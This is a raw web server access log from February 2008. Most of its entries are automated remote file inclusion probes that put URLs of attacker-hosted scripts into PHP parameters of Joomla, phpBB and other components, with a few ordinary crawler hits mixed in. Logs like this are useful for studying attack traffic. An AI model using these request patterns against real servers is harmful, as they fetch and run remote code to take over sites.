72.55.164.183 - - [17/Feb/2008:16:00:02 -0800] "GET /logs/access_080114.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.164.183 - - [17/Feb/2008:16:00:02 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:03:27 -0800] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:03:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:03:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:04:22 -0800] "GET /logs/access_080114.log//claroline/auth/ldap/authldap.php?includePath=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:04:22 -0800] "GET //claroline/auth/ldap/authldap.php?includePath=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.24.48 - - [17/Feb/2008:16:04:22 -0800] "GET /logs//claroline/auth/ldap/authldap.php?includePath=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
68.52.242.139 - - [17/Feb/2008:16:04:51 -0800] "GET /logs/access.log//admin/includes/admin_header.php?level=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
68.52.242.139 - - [17/Feb/2008:16:04:55 -0800] "GET //admin/includes/admin_header.php?level=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
89.159.200.63 - - [17/Feb/2008:16:04:58 -0800] "GET /logs/access.log HTTP/1.0" 200 2092 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
68.52.242.139 - - [17/Feb/2008:16:05:00 -0800] "GET /logs//admin/includes/admin_header.php?level=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
213.198.5.87 - - [17/Feb/2008:16:06:40 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id%5B1%5D.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
213.198.5.87 - - [17/Feb/2008:16:06:40 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id%5B1%5D.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
213.198.5.87 - - [17/Feb/2008:16:06:41 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id%5B1%5D.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:55 -0800] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:58 -0800] "GET /logs/access_080114.log//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:16:10:58 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.143.196 - - [17/Feb/2008:16:11:29 -0800] "GET /logs/album_portal.php?phpbb_root_path=http://www.cartographia.org/ftp/files/source/SinG?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
72.55.143.196 - - [17/Feb/2008:16:11:29 -0800] "GET /album_portal.php?phpbb_root_path=http://www.cartographia.org/ftp/files/source/SinG?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
67.195.58.178 - - [17/Feb/2008:16:14:49 -0800] "GET /logs/access_070917.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:16:15:49 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:16:15:49 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
67.19.192.212 - - [17/Feb/2008:16:16:10 -0800] "GET /logs/access_070917.log//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [17/Feb/2008:16:16:10 -0800] "GET //+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.19.192.212 - - [17/Feb/2008:16:16:10 -0800] "GET /logs//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mynewsassistant.com/sendstudio/archive/49/226/attachments/key.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.26.137.64 - - [17/Feb/2008:16:16:45 -0800] "GET /logs/access_070917.log//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [17/Feb/2008:16:16:45 -0800] "GET //+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.26.137.64 - - [17/Feb/2008:16:16:46 -0800] "GET /logs//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.197.68.66 - - [17/Feb/2008:16:17:35 -0800] "GET /logs/access_080114.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.197.68.66 - - [17/Feb/2008:16:17:36 -0800] "GET //errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.197.68.66 - - [17/Feb/2008:16:17:36 -0800] "GET /logs//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.176.228.30 - - [17/Feb/2008:16:26:05 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
81.176.228.30 - - [17/Feb/2008:16:26:07 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
201.21.196.10 - - [17/Feb/2008:16:29:08 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id[1].txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.21.196.10 - - [17/Feb/2008:16:29:08 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id[1].txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.21.196.10 - - [17/Feb/2008:16:29:08 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/id[1].txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.26.137.64 - - [17/Feb/2008:16:29:32 -0800] "GET /logs/access.log//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
58.26.137.64 - - [17/Feb/2008:16:29:32 -0800] "GET //+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
58.26.137.64 - - [17/Feb/2008:16:29:33 -0800] "GET /logs//+administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "galf.org"
87.106.222.188 - - [17/Feb/2008:16:29:36 -0800] "GET //skin/zero_vote/error.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
87.106.222.188 - - [17/Feb/2008:16:29:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
81.176.228.30 - - [17/Feb/2008:16:31:17 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "galf.org"
81.176.228.30 - - [17/Feb/2008:16:31:17 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.villasapart.co.uk/properties/search/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:35 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:35 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:35 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:37 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:38 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
207.58.186.92 - - [17/Feb/2008:16:31:38 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:31 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:31 -0800] "GET /logs/access_070917.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:31 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:31 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:31 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
213.203.223.93 - - [17/Feb/2008:16:33:32 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
80.38.62.39 - - [17/Feb/2008:16:33:41 -0800] "GET //skin/zero_vote/error.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
80.38.62.39 - - [17/Feb/2008:16:33:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
82.146.33.210 - - [17/Feb/2008:16:38:18 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "galf.org"
82.146.33.210 - - [17/Feb/2008:16:38:18 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "galf.org"
128.196.27.145 - - [17/Feb/2008:16:39:05 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
128.196.27.145 - - [17/Feb/2008:16:39:06 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "galf.org"
84.40.23.83 - - [17/Feb/2008:16:43:38 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:16:43:38 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:16:43:38 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.64.18 - - [17/Feb/2008:16:43:52 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "galf.org"
202.60.64.18 - - [17/Feb/2008:16:43:55 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "galf.org"
203.157.182.9 - - [17/Feb/2008:16:44:00 -0800] "GET /logs/index.php?go=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
12.10.250.90 - - [17/Feb/2008:16:45:59 -0800] "GET /logs/access_080114.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
12.10.250.90 - - [17/Feb/2008:16:45:59 -0800] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
12.10.250.90 - - [17/Feb/2008:16:45:59 -0800] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tangobuy.com/components/spscanid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.22.60.11 - - [17/Feb/2008:16:46:53 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.8.114 - - [17/Feb/2008:16:53:09 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.8.114 - - [17/Feb/2008:16:53:09 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 2697395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
79.15.137.93 - - [17/Feb/2008:16:55:03 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
79.15.137.93 - - [17/Feb/2008:16:55:04 -0800] "GET //?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "galf.org"
79.15.137.93 - - [17/Feb/2008:16:55:05 -0800] "GET /logs//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 6208 "-" "libwww-perl/5.808" "galf.org"
222.155.224.140 - - [17/Feb/2008:16:56:39 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.co.nz/search?hl=en&q=%22intitle%3Aindex+of%22LABIA&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
222.155.224.140 - - [17/Feb/2008:16:56:40 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
222.155.224.140 - - [17/Feb/2008:16:56:43 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
222.155.224.140 - - [17/Feb/2008:16:56:47 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
140.99.23.86 - - [17/Feb/2008:17:05:42 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:17:07:48 -0800] "GET /magazine.php?inc=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.195.44.107 - - [17/Feb/2008:17:08:39 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.44.86 - - [17/Feb/2008:17:08:48 -0800] "GET /logs/access.log HTTP/1.0" 200 20532 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
82.165.176.137 - - [17/Feb/2008:17:12:08 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [17/Feb/2008:17:12:17 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.6.23.122 - - [17/Feb/2008:17:13:58 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:17:15:18 -0800] "GET /logs/access_070917.log/magazine.php?inc=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:17:15:19 -0800] "GET /logs/magazine.php?inc=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.22.60.11 - - [17/Feb/2008:17:15:22 -0800] "GET /logs/access_080114.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.22.60.11 - - [17/Feb/2008:17:15:22 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.64.76.29 - - [17/Feb/2008:17:17:20 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
140.99.23.86 - - [17/Feb/2008:17:17:59 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
140.99.23.86 - - [17/Feb/2008:17:18:00 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.101.193.183 - - [17/Feb/2008:17:18:20 -0800] "GET /logs/access_080114.log/newspublish/include.php?path[docroot]=http://www.members.lycos.co.uk/tomnebunu/rfi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.101.193.183 - - [17/Feb/2008:17:18:37 -0800] "GET /newspublish/include.php?path[docroot]=http://www.members.lycos.co.uk/tomnebunu/rfi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.101.193.183 - - [17/Feb/2008:17:18:38 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.members.lycos.co.uk/tomnebunu/rfi/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.11.181 - - [17/Feb/2008:17:18:56 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
84.234.71.230 - - [17/Feb/2008:17:20:09 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.222.188 - - [17/Feb/2008:17:20:44 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
87.106.222.188 - - [17/Feb/2008:17:20:45 -0800] "GET /skin/zero_vote/login.php?dir=http://www.soh-freedomforce.de/components/com_simpleboard/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:20:57 -0800] "GET /logs/access_080114.log//agendax/addevent.inc.php?agendax_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:20:57 -0800] "GET /logs/access_080114.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
